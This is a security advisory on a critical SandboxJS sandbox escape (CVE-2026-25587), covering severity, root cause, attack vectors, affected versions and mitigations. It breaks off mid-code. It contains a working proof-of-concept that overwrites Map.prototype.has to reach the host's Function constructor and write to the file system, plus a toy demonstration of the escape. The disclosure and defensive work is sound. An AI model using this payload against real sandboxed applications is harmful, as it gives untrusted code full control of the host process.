Description
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, because Map is in SAFE_PROTOTYPES, its prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped. This vulnerability is fixed in 0.8.29.
EPSS Score: 0%
EUVD-2026-5590: Critical Sandbox Escape Vulnerability in SandboxJS
Executive Summary
Severity: CRITICAL (CVSS 10.0)
EUVD-2026-5590 is a critical sandbox escape in SandboxJS, a JavaScript sandboxing library. Untrusted code can reach the host's real Map.prototype through the sandbox's prototype whitelist and overwrite Map.prototype.has; the replacement function runs outside the sandbox the next time host code performs a Map lookup, so the attacker obtains arbitrary code execution with the privileges of the host process. This is a complete failure of the security boundary that SandboxJS exists to enforce.
1. Vulnerability Assessment and Severity Evaluation
Severity Analysis
- CVSS 3.1 Score: 10.0 (Critical)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSS Breakdown:
- Attack Vector (AV:N): The untrusted script normally arrives over the network (submitted code, an uploaded plugin, a template); no local access is needed
- Attack Complexity (AC:L): A single assignment to Map.prototype.has; no race to win, nothing to guess
- Privileges Required (PR:N): Anyone who can get a script evaluated by the sandbox, which in the intended use is an untrusted party
- User Interaction (UI:N): None; the payload fires on the next Map lookup performed by host code
- Scope (S:C): The vulnerable component is the sandbox; the impact lands on the host process and everything it can reach
- Confidentiality (C:H): Full read access to the memory, files and secrets available to the host process
- Integrity (I:H): Full write access with the host process's privileges
- Availability (A:H): The host process can be crashed or hung at will
Risk Assessment:
This vulnerability is a complete failure of the security boundary. The sandbox, whose purpose is to run untrusted JavaScript without handing it the host, can be bypassed with a single assignment. It is particularly severe because:
- Fundamental Design Flaw: The sandbox handed untrusted code a reference to the host's own Map.prototype. Built-in prototypes are shared mutable state, so any write to them from inside the sandbox is a write to the host
- Zero Prerequisites: Exploitation needs nothing beyond getting a script evaluated by the sandbox; no authentication, special privileges or user interaction
- Complete Compromise: Successful exploitation runs attacker code with the privileges of the host process (a Node.js process, a browser page, an extension)
- Widespread Impact: Every application that evaluates untrusted scripts with SandboxJS below 0.8.29 is affected. An application that only runs its own trusted scripts through the library has no attacker in a position to exploit it, so the effective risk depends on how the sandbox is exposed
2. Potential Attack Vectors and Exploitation Methods
Technical Vulnerability Details
Root Cause: SandboxJS's SAFE_PROTOTYPES list, the whitelist of built-in prototypes whose members sandboxed code may use, contains Map. The whitelisted entry is a reference to the host's own Map.prototype object, so sandboxed code that reads Map.prototype and assigns a property on it mutates the host's prototype directly.
Exploitation Mechanism:
// Step 1: Read Map.prototype (permitted, because Map is whitelisted)
const mapProto = Map.prototype;
// Step 2: Overwrite a method that host code is certain to call.
// This assignment lands on the host's real Map.prototype, so it affects every
// Map in the process, including the ones the sandbox's own internals use.
mapProto.has = function(key) {
  // Runs as host code with a host Map as `this`; from there the real Function
  // constructor, and with it the host global scope, is one property walk away
  return this.constructor.constructor('return this')();
};
// Step 3: Wait. The next time any host code, the sandbox's internal bookkeeping
// included, calls .has() on a Map, the replacement runs outside the sandbox
// with the host process's privileges.
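The mechanism above in miniature, as an added example that is not SandboxJS's code: a toy interpreter that, modelled on the description above, keeps its prototype whitelist in a Map, consults it with .has() before allowing property access, and hands untrusted code the host's real Map. The names makeToySandbox, allowsAccess and attackerPayload are invented for the illustration. The escape works because the Map.prototype the script writes to is the very object the interpreter's own whitelist Map inherits from; the demo restores the prototype afterwards, which a real attack would not.

```javascript
// Added illustration, not code from SandboxJS. Keep a reference to the
// genuine method so the demo can undo its own pollution.
const nativeHas = Map.prototype.has;

// A toy sandbox: whitelist keyed by prototype object, checked with Map#has.
// Function.prototype is deliberately absent, so reaching the Function
// constructor through .constructor is supposed to be impossible.
function makeToySandbox() {
  const prototypeWhitelist = new Map([
    [Map.prototype, true],
    [Object.prototype, true],
  ]);
  return {
    // The bug: untrusted code receives the host's real Map, whose
    // .prototype is the same object prototypeWhitelist itself inherits from.
    globals: { Map },
    allowsAccess(obj) {
      return prototypeWhitelist.has(Object.getPrototypeOf(obj));
    },
  };
}

// What the untrusted script does, using only the global the sandbox gave it.
function attackerPayload(globals) {
  const savedHas = globals.Map.prototype.has;
  globals.Map.prototype.has = function (key) {
    // Lie to every caller, the interpreter's whitelist check included, about
    // Function.prototype; delegate everything else so nothing else breaks.
    return key === Function.prototype || savedHas.call(this, key);
  };
}

// Runs the escape end to end and reports each stage.
function demonstrateEscape() {
  const sb = makeToySandbox();
  const someFunction = function () {};
  const result = {
    blockedBefore: !sb.allowsAccess(someFunction), // whitelist works untouched
    allowedAfter: false,
    reachedHostGlobal: false,
    restored: false,
  };
  try {
    attackerPayload(sb.globals);
    result.allowedAfter = sb.allowsAccess(someFunction); // check now defeated
    if (result.allowedAfter) {
      // With the check gone, .constructor on any function is the host's
      // real Function, and Function('return globalThis') is the host scope.
      const HostFunction = someFunction.constructor;
      result.reachedHostGlobal =
        HostFunction('return globalThis')() === globalThis;
    }
  } finally {
    Map.prototype.has = nativeHas; // undo the pollution for this demo only
  }
  result.restored = Map.prototype.has === nativeHas;
  return result;
}
```

The whitelist never changes; only the method used to consult it does. That is why the fix has to keep the host's prototype objects out of the sandbox's reach rather than filter the script's text.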
Attack Vectors:
Vector 1: Direct Code Injection
- Scenario: Web applications accepting user-provided JavaScript for execution in sandbox
- Method: Submit malicious code that overwrites Map.prototype.has
- Impact: Immediate sandbox escape, access to Node.js/browser APIs
Vector 2: Supply Chain
- Scenario: A third-party package (plugin pack, rule set, template bundle) ships scripts that the application feeds into SandboxJS
- Method: The bundled script overwrites Map.prototype.has when the application evaluates it; nothing happens at install time, because install scripts never run inside the sandbox
- Impact: Escape into the application process wherever the package's scripts are executed
Vector 3: Plugin/Extension Systems
- Scenario: Applications using SandboxJS to isolate third-party plugins
- Method: Malicious plugin exploits vulnerability to escape isolation
- Impact: Access to application internals, user data, system resources
Vector 4: Server-Side Template Injection (SSTI)
- Scenario: Server-side JavaScript rendering with SandboxJS protection
- Method: Inject prototype pollution payload through template variables
- Impact: Remote code execution on server infrastructure
Vector 5: WebAssembly / Memory Corruption (not applicable)
- This is a logic flaw in a JavaScript interpreter, not a memory-safety bug; no WebAssembly and no preparation of memory state is involved or needed
- Any path that gets attacker-controlled source into the sandbox (Vectors 1 to 4) is sufficient on its own
Proof of Concept (Conceptual):
// Minimal PoC for sandbox escape, evaluated as the untrusted script
(function() {
  // Overwrite Map.prototype.has; this is the host's real prototype
  Map.prototype.has = function() {
    // Walk from the Map instance to the host's Function constructor
    const FunctionConstructor = this.constructor.constructor;
    // Execute arbitrary code outside the sandbox
    const globalScope = FunctionConstructor('return this')();
    // Example: touch the file system (Node.js). require is module-scoped, not
    // a property of the global object, so reach it through process.mainModule
    // (deprecated but still present when the host is a CommonJS entry point)
    const fs = globalScope.process.mainModule.require('fs');
    fs.writeFileSync('/tmp/pwned', 'Sandbox escaped');
    return false; // Return a plausible value so the caller notices nothing
  };
  // The payload fires the next time any host code, the sandbox's internals
  // included, calls .has() on a Map
})();
3. Affected Systems and Software Versions
Directly Affected:
- Product: SandboxJS (nyariv/SandboxJS), published on npm as @nyariv/sandboxjs
- Vulnerable Versions: All versions < 0.8.29
- Fixed Version: 0.8.29 and later
- CVE Identifier: CVE-2026-25587
Potentially Affected Ecosystems:
Node.js Applications:
- Server-side JavaScript applications using SandboxJS for code isolation
- Serverless functions (AWS Lambda, Azure Functions, Google Cloud Functions)
- Backend API services processing user-submitted code
- Build systems and CI/CD pipelines executing untrusted scripts
Browser-Based Applications:
- Web-based IDEs and code playgrounds (e.g., JSFiddle-like platforms)
- Online learning platforms with interactive coding exercises
- Browser extensions using SandboxJS for content script isolation
- Progressive Web Apps (PWAs) with plugin architectures
Specific Use Cases at Risk:
- Low-code/No-code Platforms: User-defined business logic execution
- Content Management Systems: Custom scripting capabilities
- Game Engines: User-generated content and modding support
- Analytics Platforms: Custom metric calculation scripts
- Workflow Automation Tools: User-defined automation scripts
- Testing Frameworks: Isolated test execution environments
Dependency Chain Impact:
Applications may be vulnerable through transitive dependencies. Organizations should audit:
- Direct dependencies in package.json and package-lock.json
- Nested dependencies, using npm ls @nyariv/sandboxjs or yarn why @nyariv/sandboxjs
- Bundled applications that may include vulnerable versions
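The same audit as a script, added here as an example and not part of the advisory or the SandboxJS project: it walks the "packages" map of an npm lockfile (lockfileVersion 2 or 3), finds every installed copy of @nyariv/sandboxjs, nested and bundled copies included, and flags versions below 0.8.29. The sample lockfile is constructed for the illustration; the plugin package name in it is invented.

```javascript
// Added example; scans a parsed package-lock.json rather than trusting the
// top-level version alone.
const PACKAGE = '@nyariv/sandboxjs';
const FIXED = '0.8.29';

// Numeric comparison of dotted versions. A pre-release of the fixed version
// (0.8.29-beta.1) sorts below 0.8.29 and is therefore still reported.
function compareVersions(a, b) {
  const [aCore, aPre] = a.split('-');
  const [bCore, bPre] = b.split('-');
  const ap = aCore.split('.').map(Number);
  const bp = bCore.split('.').map(Number);
  for (let i = 0; i < Math.max(ap.length, bp.length); i++) {
    const d = (ap[i] || 0) - (bp[i] || 0);
    if (d !== 0) return d;
  }
  if (aPre && !bPre) return -1;
  if (!aPre && bPre) return 1;
  return 0;
}

function isVulnerable(version) {
  return compareVersions(version, FIXED) < 0;
}

// lock: the parsed lockfile. Every installed copy, however deeply nested,
// has a path ending in node_modules/<package>; bundled copies too.
function findVulnerableCopies(lock) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project entry
    if (!path.endsWith(`node_modules/${PACKAGE}`)) continue;
    if (isVulnerable(entry.version)) {
      hits.push({ path, version: entry.version, bundled: Boolean(entry.inBundle) });
    }
  }
  return hits;
}

// Constructed sample: the direct dependency is patched, but a plugin package
// bundles its own older copy, which npm ls on the top level would not surface.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'app', dependencies: { [PACKAGE]: '^0.8.29', 'example-plugin': '1.0.0' } },
    'node_modules/@nyariv/sandboxjs': { version: '0.8.29' },
    'node_modules/example-plugin': { version: '1.0.0', dependencies: { [PACKAGE]: '0.8.20' } },
    'node_modules/example-plugin/node_modules/@nyariv/sandboxjs': { version: '0.8.20', inBundle: true },
  },
};

// For a real project:
// findVulnerableCopies(JSON.parse(require('fs').readFileSync('package-lock.json', 'utf8')))
```

Run it against each deployable's lockfile, not just the repository root; a bundled copy inside a plugin is exactly the case the top-level version number hides.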
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours):
1. Version Upgrade
# Update to the patched version (the package is published as @nyariv/sandboxjs)
npm install @nyariv/sandboxjs@latest
# or
yarn upgrade @nyariv/sandboxjs@latest
# Verify every installed copy, nested ones included
npm ls @nyariv/sandboxjs
# Every reported version must be >= 0.8.29
2. Emergency Workaround (if immediate upgrade impossible):
// Freeze the exposed built-in prototypes before anything else loads, in
// particular before SandboxJS itself and before any library that patches them
Object.freeze(Map.prototype);
Object.freeze(Set.prototype);
Object.freeze(WeakMap.prototype);
Object.freeze(WeakSet.prototype);
// Initialize SandboxJS after freezing
const Sandbox = require('@nyariv/sandboxjs');
Warning: The freeze makes the sandboxed assignment fail (a TypeError in strict mode, a silent no-op otherwise), but it is process-wide and irreversible, so it breaks any polyfill or library that patches these prototypes at runtime, and it covers only these four objects. Treat it as a stopgap until the upgrade is deployed, not as a replacement for it.
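The workaround with a verification step, as an added example that is not from the SandboxJS project: hardenBuiltins() freezes the same four prototypes, builtinsIntact() is a canary that confirms every method on them is still native code (run it at startup and again after each sandbox execution), and attemptPollution() shows what the attacker's write now does. The function names and the choice of four prototypes are assumptions taken from the workaround above, not a statement of which prototypes SandboxJS whitelists.

```javascript
// Added example: freeze, verify, and show the blocked write.
const GUARDED_PROTOTYPES = [Map.prototype, Set.prototype, WeakMap.prototype, WeakSet.prototype];

// Freeze before SandboxJS or any prototype-patching library is loaded.
// Returns true when every guarded prototype is frozen.
function hardenBuiltins() {
  for (const proto of GUARDED_PROTOTYPES) Object.freeze(proto);
  return GUARDED_PROTOTYPES.every((proto) => Object.isFrozen(proto));
}

// Canary: list every own string-keyed method (or getter, e.g. size) on the
// guarded prototypes whose source is not "[native code]". An empty list means
// nothing has been replaced. Symbol-keyed members are not inspected here.
function builtinsIntact() {
  const tampered = [];
  for (const proto of GUARDED_PROTOTYPES) {
    for (const name of Object.getOwnPropertyNames(proto)) {
      const desc = Object.getOwnPropertyDescriptor(proto, name);
      const fn = desc.value !== undefined ? desc.value : desc.get;
      if (typeof fn !== 'function') continue;
      if (!Function.prototype.toString.call(fn).includes('[native code]')) {
        tampered.push(`${proto.constructor.name}.prototype.${name}`);
      }
    }
  }
  return tampered;
}

// The attacker's assignment after hardening. Strict mode is forced inside the
// function so the outcome is deterministic: a TypeError, and no change.
function attemptPollution() {
  'use strict';
  const before = Map.prototype.has;
  let threw = false;
  try {
    Map.prototype.has = function () { return true; };
  } catch (err) {
    threw = err instanceof TypeError;
  }
  return { threw, unchanged: Map.prototype.has === before };
}
```

Call hardenBuiltins() as the first statement of the process entry point; a freeze that runs after a polyfill has already replaced a method only locks the replacement in place, which builtinsIntact() will report.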
3. Disable Affected Features
- Temporarily disable user code execution features until the upgrade is deployed
- Do not substitute source filtering for the fix: rejecting scripts that contain the text "Map.prototype" is trivially evaded (computed property names, string concatenation) and blocks nothing
- Add rate limiting and logging to code execution endpoints so that an attempt is at least visible
Short-Term Mitigations (Priority 2 - Within 1 Week):
1. Defense in Depth
// Add layers around the sandbox instead of relying on it alone. Note that
// node:vm is not a security mechanism (the Node.js documentation says so
// explicitly): it separates globals, not privileges. Real isolation means a
// separate process or worker with resource limits, or a container.
const vm = require('vm');
const Sandbox = require('@nyariv/sandboxjs');
function executeUserCode(code) {
  // Layer 1: Input validation (size, encoding); token denylists are not a control
  if (!isValidCode(code)) {
    throw new Error('Invalid code');
  }
  // Layer 2: Resource limits. These values are only configuration; a wall-clock
  // timeout must be enforced from outside the interpreter (worker termination),
  // since synchronous sandboxed code cannot be interrupted from the same thread
  const timeout = 5000; // 5 seconds
  const memoryLimit = 50 * 1024 * 1024; // 50MB
  // Layer 3: VM context + SandboxJS (check option names against the SandboxJS release in use)
  const context = vm.createContext({
    sandbox: new Sandbox({
      timeout: timeout,